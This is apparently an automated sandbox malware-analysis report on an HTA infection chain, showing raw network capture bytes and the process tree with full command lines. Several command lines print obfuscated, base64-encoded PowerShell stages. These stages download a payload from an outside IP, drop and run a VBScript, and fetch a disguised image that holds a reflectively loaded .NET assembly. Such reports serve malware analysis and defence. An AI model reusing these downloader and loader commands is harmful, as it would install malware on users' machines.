{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=auDwW7GmajZXn59%2FIT1i%2Fej6xVB4LjVKjDlganFyNyqga5T9x1lyv4EbCcpERQ7OOY9SGtH9rOkv0r%2Fauuxar8w3VOP97CY5bZSMecUoEZ9a1vgQkcrrWmzz4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f34d0bd6d3915bb-EWR alt-svc: h3=":443"; ma=86400
2024-12-17 06:21:51 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 34 39 31 26 6d 69 6e 5f 72 74 74 3d 31 34 38 37 26 72 74 74 5f 76 61 72 3d 35 36 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 31 36 30 31 30 26 63 77 6e 64 3d 31 31 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 64 34 30 62 34 33 37 63 37 35 35 35 30 61 32 26 74 73 3d 34 35 32 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1487&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1916010&cwnd=113&unsent_bytes=0&cid=0d40b437c75550a2&ts=452&x=0"
2024-12-17 06:21:51 UTC	1237	IN	Data Raw: 37 61 39 34 0d 0a 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 7a94=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 46 70 53 4b 46 61 49 33 4c 38 62 7a 4b 30 38 69 6b 65 64 55 64 4f 34 76 42 6c 79 6b 39 61 56 53 6b 38 31 2b 70 4d 65 33 6b 57 43 4f 36 5a 69 31 53 6c 54 56 68 74 6a 64 38 2f 2b 52 38 39 31 62 35 4a 78 48 58 57 31 37 6e 35 6d 4c 49 38 4c 6b 69 56 56 51 45 54 41 35 35 65 47 56 46 59 75 7a 62 51 41 2f 50 2f 4c 6d 62 46 38 68 38 7a 31 67 51 4c 77 65 2f 49 32 31 33 48 57 79 72 62 68 76 47 2b 78 43 35 43 2f 67 41 78 48 4c 48 69 66 59 53 70 70 50 36 39 56 72 35 62 68 2f 56 58 74 76 5a 37 34 53 78 4e 48 50 7a 46 37 62 51 67 61 6a 46 4e 56 6b 73 44 76 52 36 64 6a 39 54 49 38 35 72 55 53 64 2f 6a 75 75 69 71 77 36 63 44 67 63 4d 32 35 69 59 38 4e 4e 64 38 45 53 55 54 41 76 79 6f 71 70 2b 6b 61 51 59 59 5a 7a 48 41 2b 4a 6e 68 31 77 74 4a 55 71 42 39 33 67 6b 2b 67 Data Ascii: FpSKFaI3L8bzK08ikedUdO4vBlyk9aVSk81+pMe3kWCO6Zi1SlTVhtjd8/+R891b5JxHXW17n5mLI8LkiVVQETA55eGVFYuzbQA/P/LmbF8h8z1gQLwe/I213HWyrbhvG+xC5C/gAxHLHifYSppP69Vr5bh/VXtvZ74SxNHPzF7bQgajFNVksDvR6dj9TI85rUSd/juuiqw6cDgcM25iY8NNd8ESUTAvyoqp+kaQYYZzHA+Jnh1wtJUqB93gk+g
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 65 65 48 71 43 46 69 71 30 45 71 5a 56 6e 67 50 35 33 36 44 6a 4e 67 63 4c 45 65 66 6e 49 6e 64 6b 6f 2f 73 65 64 63 44 49 50 50 7a 79 53 5a 2f 76 33 6a 50 30 68 75 6f 4e 4c 69 62 62 63 57 5a 49 51 78 6a 6e 46 64 54 69 4b 34 5a 4f 67 74 32 56 67 4e 56 70 54 31 38 4b 2f 36 61 70 73 38 50 75 61 53 6c 6e 4b 6c 66 4d 58 63 69 35 6c 6f 62 75 6a 4c 4e 4f 66 4c 55 76 2f 36 76 6b 51 76 7a 54 48 4d 61 47 63 58 4a 4e 4d 76 4b 34 74 33 4b 31 71 6d 63 63 36 68 78 66 32 33 6d 54 5a 48 4a 32 6c 7a 46 6f 35 37 4f 56 6f 62 6c 4d 45 31 65 4d 79 31 6e 76 6a 48 74 4e 6e 6f 35 77 45 38 71 31 45 42 65 45 42 38 46 6a 43 33 57 52 64 2b 37 55 45 36 63 34 4b 37 79 34 69 4c 35 63 55 32 43 76 44 70 55 4c 73 48 48 2f 30 50 6e 67 47 6a 61 57 34 4c 7a 53 53 70 32 4b 67 48 52 59 70 6f Data Ascii: eeHqCFiq0EqZVngP536DjNgcLEefnIndko/sedcDIPPzySZ/v3jP0huoNLibbcWZIQxjnFdTiK4ZOgt2VgNVpT18K/6aps8PuaSlnKlfMXci5lobujLNOfLUv/6vkQvzTHMaGcXJNMvK4t3K1qmcc6hxf23mTZHJ2lzFo57OVoblME1eMy1nvjHtNno5wE8q1EBeEB8FjC3WRd+7UE6c4K7y4iL5cU2CvDpULsHH/0PngGjaW4LzSSp2KgHRYpo
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 31 4b 71 4c 59 37 79 71 47 47 59 69 47 7a 6a 6c 6d 32 47 44 2f 70 42 4c 6e 48 79 33 70 6c 71 66 74 76 5a 53 2b 5a 6c 52 79 2f 6a 75 5a 5a 61 33 6a 38 45 42 41 78 48 6a 50 67 2f 37 56 65 73 65 76 6a 68 36 61 64 62 4c 51 52 43 43 39 33 32 32 71 71 38 78 6b 42 6c 54 63 76 46 7a 74 30 73 70 67 76 42 76 37 35 66 42 43 70 75 4b 6f 49 75 63 4b 57 33 69 42 53 6f 63 69 48 6f 48 34 45 37 53 37 45 71 7a 4b 4c 45 72 6c 34 4a 79 46 56 76 78 35 50 4d 36 78 47 63 68 76 72 72 33 66 72 32 4a 33 4e 39 48 30 47 79 65 56 68 75 69 45 6c 6f 72 63 34 34 31 6b 2f 65 72 31 58 37 74 46 7a 4e 7a 47 48 47 6e 4f 75 48 75 49 75 68 44 66 5a 38 69 2f 54 52 6c 42 49 58 63 4e 36 6b 72 57 7a 73 35 66 48 64 5a 51 38 6e 33 42 37 34 30 52 4b 70 36 34 57 37 54 37 38 77 45 75 4b 71 6b 35 74 58 Data Ascii: 1KqLY7yqGGYiGzjlm2GD/pBLnHy3plqftvZS+ZlRy/juZZa3j8EBAxHjPg/7Vesevjh6adbLQRCC9322qq8xkBlTcvFzt0spgvBv75fBCpuKoIucKW3iBSociHoH4E7S7EqzKLErl4JyFVvx5PM6xGchvrr3fr2J3N9H0GyeVhuiElorc441k/er1X7tFzNzGHGnOuHuIuhDfZ8i/TRlBIXcN6krWzs5fHdZQ8n3B740RKp64W7T78wEuKqk5tX
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 57 79 37 50 33 33 51 45 62 53 61 63 34 48 35 4f 41 7a 37 77 79 6b 52 6b 74 79 68 72 51 45 77 4f 4d 6f 78 36 75 34 75 2b 50 68 65 6e 41 35 45 6c 77 54 4e 79 4b 48 30 4a 32 78 62 73 75 4e 71 37 78 69 39 4f 6a 74 49 49 44 62 53 6a 35 61 66 55 71 67 6c 2f 56 4c 62 6d 46 50 38 37 59 32 53 44 48 59 56 64 48 42 78 70 38 52 7a 4f 53 6f 73 47 70 62 31 41 78 71 55 54 41 63 76 44 77 65 66 71 77 6d 68 44 34 44 2b 71 44 70 65 44 37 4c 6f 6e 6a 41 70 52 2b 35 56 6e 6d 6a 35 74 37 38 79 59 4c 31 4a 6c 61 43 6a 6d 36 34 79 35 76 38 70 59 30 79 67 72 67 58 6b 65 39 74 36 32 54 74 41 58 56 36 77 41 71 45 2f 47 74 38 52 4d 47 76 38 4b 34 74 68 30 5a 45 31 2b 4c 4f 56 44 79 77 30 79 69 6f 6f 62 64 6a 33 45 77 51 44 32 62 67 55 61 58 4b 65 54 44 63 72 64 75 4b 47 75 55 61 52 Data Ascii: Wy7P33QEbSac4H5OAz7wykRktyhrQEwOMox6u4u+PhenA5ElwTNyKH0J2xbsuNq7xi9OjtIIDbSj5afUqgl/VLbmFP87Y2SDHYVdHBxp8RzOSosGpb1AxqUTAcvDwefqwmhD4D+qDpeD7LonjApR+5Vnmj5t78yYL1JlaCjm64y5v8pY0ygrgXke9t62TtAXV6wAqE/Gt8RMGv8K4th0ZE1+LOVDyw0yioobdj3EwQD2bgUaXKeTDcrduKGuUaR
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 46 56 75 58 4a 78 76 69 69 76 56 6c 48 7a 63 43 39 50 73 67 68 51 72 41 49 7a 78 33 45 71 2f 4b 72 56 49 7a 53 66 76 67 61 39 35 48 68 5a 63 52 50 34 4e 7a 4a 62 2f 66 61 33 57 6d 4e 6c 4c 58 69 76 65 78 47 2f 6e 42 42 7a 72 69 64 4d 75 56 41 45 74 76 72 79 74 77 59 50 30 79 52 49 76 65 6e 49 36 48 6c 58 78 77 51 75 6a 43 4c 6b 6a 70 67 4b 78 46 66 48 73 73 64 67 77 30 70 6c 41 47 34 4c 4a 48 53 59 65 35 4f 77 4f 62 67 6f 37 68 72 62 35 4a 78 4b 46 50 56 75 74 45 32 37 4f 62 77 50 79 33 6b 32 69 2f 2b 36 65 44 72 37 4a 50 57 2f 6b 52 47 49 4b 4f 4b 77 64 74 47 5a 36 2b 45 66 69 6d 34 6c 70 59 57 54 55 6f 67 6c 76 6d 54 42 49 51 2f 6d 59 74 63 35 38 46 53 4f 4c 57 75 63 2f 6a 4a 61 67 33 4a 47 6b 36 64 35 56 35 57 54 48 34 41 79 35 7a 47 77 7a 6a 31 44 35 Data Ascii: FVuXJxviivVlHzcC9PsghQrAIzx3Eq/KrVIzSfvga95HhZcRP4NzJb/fa3WmNlLXivexG/nBBzridMuVAEtvrytwYP0yRIvenI6HlXxwQujCLkjpgKxFfHssdgw0plAG4LJHSYe5OwObgo7hrb5JxKFPVutE27ObwPy3k2i/+6eDr7JPW/kRGIKOKwdtGZ6+Efim4lpYWTUoglvmTBIQ/mYtc58FSOLWuc/jJag3JGk6d5V5WTH4Ay5zGwzj1D5
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 68 73 31 6d 67 2f 5a 32 70 50 2b 6b 61 59 2b 75 4b 36 4d 76 65 79 5a 62 73 69 4c 41 36 48 70 36 72 39 36 4f 66 4a 5a 37 34 48 69 49 42 62 56 4d 35 6c 36 6e 4f 50 45 2b 50 71 42 36 45 43 77 42 35 2f 70 50 52 41 55 30 68 31 6e 65 6f 47 77 44 69 63 37 4a 38 67 38 33 31 38 6b 35 4b 73 4a 37 59 34 4c 62 56 68 41 70 30 4a 48 79 4f 38 58 2f 71 6d 38 56 39 2f 4f 61 74 41 33 37 36 63 75 37 62 33 52 67 48 6c 52 70 59 70 4f 41 71 62 34 6a 63 72 70 42 62 49 58 33 46 59 66 32 4d 47 7a 64 62 43 76 48 35 4a 71 71 38 33 45 78 44 43 68 4d 67 76 64 4d 63 46 57 32 73 6b 6e 7a 66 79 42 78 6d 2f 38 65 51 72 6e 41 56 76 33 50 42 70 73 4b 4f 59 6d 37 4e 5a 54 48 74 6c 66 41 6c 4f 58 34 78 4c 48 36 64 55 4b 64 32 66 4f 7a 6a 39 44 49 62 33 43 6b 46 38 2f 43 63 53 5a 69 45 33 6a Data Ascii: hs1mg/Z2pP+kaY+uK6MveyZbsiLA6Hp6r96OfJZ74HiIBbVM5l6nOPE+PqB6ECwB5/pPRAU0h1neoGwDic7J8g8318k5KsJ7Y4LbVhAp0JHyO8X/qm8V9/OatA376cu7b3RgHlRpYpOAqb4jcrpBbIX3FYf2MGzdbCvH5Jqq83ExDChMgvdMcFW2sknzfyBxm/8eQrnAVv3PBpsKOYm7NZTHtlfAlOX4xLH6dUKd2fOzj9DIb3CkF8/CcSZiE3j
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 66 6c 7a 4b 72 35 57 47 30 64 34 4e 53 4f 32 32 48 58 41 35 5a 63 70 36 51 69 33 56 77 31 57 4e 66 6f 34 39 41 47 5a 52 78 70 36 58 48 79 57 39 58 49 71 4e 77 55 74 48 45 63 36 32 50 41 73 70 55 74 30 68 72 52 6d 6e 4d 52 30 41 68 2b 54 36 47 2b 57 4a 50 53 57 45 6f 41 76 6d 6a 61 30 57 48 35 56 31 65 41 6a 6b 67 50 6a 5a 72 64 79 6c 57 46 42 74 42 6d 6c 50 6e 65 54 62 77 2f 54 50 44 72 54 58 69 4d 2b 6f 58 32 67 56 67 75 71 4d 79 33 4d 54 4f 67 35 7a 7a 49 31 69 61 77 39 4b 44 67 6b 34 2b 4e 31 72 45 6f 4e 70 63 66 37 57 78 44 68 65 47 32 51 7a 6b 54 6d 49 68 62 2f 45 59 78 41 46 32 6d 55 6c 4a 53 65 67 76 32 6d 7a 54 4e 61 5a 78 64 6d 41 32 2f 35 39 4d 36 6c 75 68 48 39 50 6e 4e 6e 44 6c 2b 35 43 6b 38 49 41 37 54 50 48 51 2f 70 7a 4b 4e 6b 41 37 31 4e Data Ascii: flzKr5WG0d4NSO22HXA5Zcp6Qi3Vw1WNfo49AGZRxp6XHyW9XIqNwUtHEc62PAspUt0hrRmnMR0Ah+T6G+WJPSWEoAvmja0WH5V1eAjkgPjZrdylWFBtBmlPneTbw/TPDrTXiM+oX2gVguqMy3MTOg5zzI1iaw9KDgk4+N1rEoNpcf7WxDheG2QzkTmIhb/EYxAF2mUlJSegv2mzTNaZxdmA2/59M6luhH9PnNnDl+5Ck8IA7TPHQ/pzKNkA71N
2024-12-17 06:21:51 UTC	1369	IN	Data Raw: 4b 6a 76 38 52 58 74 57 4a 31 30 4c 66 41 2b 52 4c 66 51 6e 74 68 68 68 64 42 45 48 34 41 6f 33 66 51 6e 71 36 2b 61 61 41 68 33 67 4f 6b 30 67 4e 36 6d 6b 45 72 6a 67 65 41 51 64 34 73 52 57 44 6a 75 59 62 35 55 77 5a 32 45 73 67 71 76 45 38 71 73 6b 43 72 42 68 73 4c 4b 47 56 78 74 51 58 64 6f 64 73 6d 4b 67 47 73 30 4e 46 36 4e 50 4e 64 71 66 5a 63 35 52 64 6d 50 6e 68 73 39 76 49 55 6f 6a 6b 31 76 55 58 64 66 68 4c 5a 45 48 50 63 77 32 75 35 76 5a 50 4f 6d 7a 79 44 2f 4e 50 38 32 38 42 35 54 78 61 6c 43 32 33 5a 57 54 63 53 54 48 35 66 35 6b 58 4c 78 75 70 46 78 6e 6a 73 41 2b 42 44 45 64 2b 53 73 54 38 39 50 6c 53 32 6f 35 76 6b 63 62 58 6c 39 57 6d 5a 68 32 49 47 6f 66 45 53 42 51 51 54 50 74 61 6e 36 50 78 55 59 58 65 44 78 51 46 6a 56 35 67 6d 51 Data Ascii: Kjv8RXtWJ10LfA+RLfQnthhhdBEH4Ao3fQnq6+aaAh3gOk0gN6mkErjgeAQd4sRWDjuYb5UwZ2EsgqvE8qskCrBhsLKGVxtQXdodsmKgGs0NF6NPNdqfZc5RdmPnhs9vIUojk1vUXdfhLZEHPcw2u5vZPOmzyD/NP828B5TxalC23ZWTcSTH5f5kXLxupFxnjsA+BDEd+SsT89PlS2o5vkcbXl9WmZh2IGofESBQQTPtan6PxUYXeDxQFjV5gmQ

Target ID:	0
Start time:	01:21:12
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\createdbetterthingswithgreatnressgivenmebackwithnice.hta"
Imagebase:	0x6b0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:21:13
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:21:13
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:21:14
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Imagebase:	0x160000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:21:17
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"
Imagebase:	0x1c0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:21:17
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD327.tmp" "c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP"
Imagebase:	0x1000000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:21:23
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS"
Imagebase:	0x260000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:21:23
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing
Imagebase:	0x160000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
